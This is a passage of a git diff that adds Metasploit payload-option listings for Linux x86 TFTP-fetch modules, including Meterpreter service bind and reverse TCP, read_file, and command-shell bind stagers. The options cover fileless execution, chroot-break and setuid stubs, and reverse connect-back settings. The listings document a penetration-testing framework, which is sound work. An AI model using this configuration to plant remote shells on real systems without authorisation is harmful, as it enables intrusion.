+Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ynHQURpcEiz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_bind_tcp.txt new file mode 100644 index 0000000..f895b4b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_bind_tcp.txt @@ -0,0 +1,91 @@ + + Name: TFTP Fetch, Linux Meterpreter Service, Bind TCP + Module: payload/cmd/linux/tftp/x86/metsvc_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YntZRPaQmR no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_reverse_tcp.txt new file mode 100644 index 0000000..610f07a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-metsvc_reverse_tcp.txt @@ -0,0 +1,98 @@ + + Name: TFTP Fetch, Linux Meterpreter Service, Reverse TCP Inline + Module: payload/cmd/linux/tftp/x86/metsvc_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HvRAoedhhd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-read_file.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-read_file.txt new file mode 100644 index 0000000..8bac663 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-read_file.txt @@ -0,0 +1,76 @@ + + Name: TFTP Fetch, Linux Read File + Module: payload/cmd/linux/tftp/x86/read_file + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hal + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FD 1 yes The file descriptor to write output to +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PATH yes The file path to read + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME aeIgRARy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp.txt new file mode 100644 index 0000000..db54df9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp.txt @@ -0,0 +1,94 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ztrcKmCZsi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..6f30cc4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,95 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME KpEpsXAIvkIl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_nonx_tcp.txt new file mode 100644 index 0000000..f2e894d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_nonx_tcp.txt @@ -0,0 +1,92 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/tftp/x86/shell/bind_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WlPZFdeTUcLW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp.txt new file mode 100644 index 0000000..7864986 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp.txt @@ -0,0 +1,93 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86) + Module: payload/cmd/linux/tftp/x86/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) 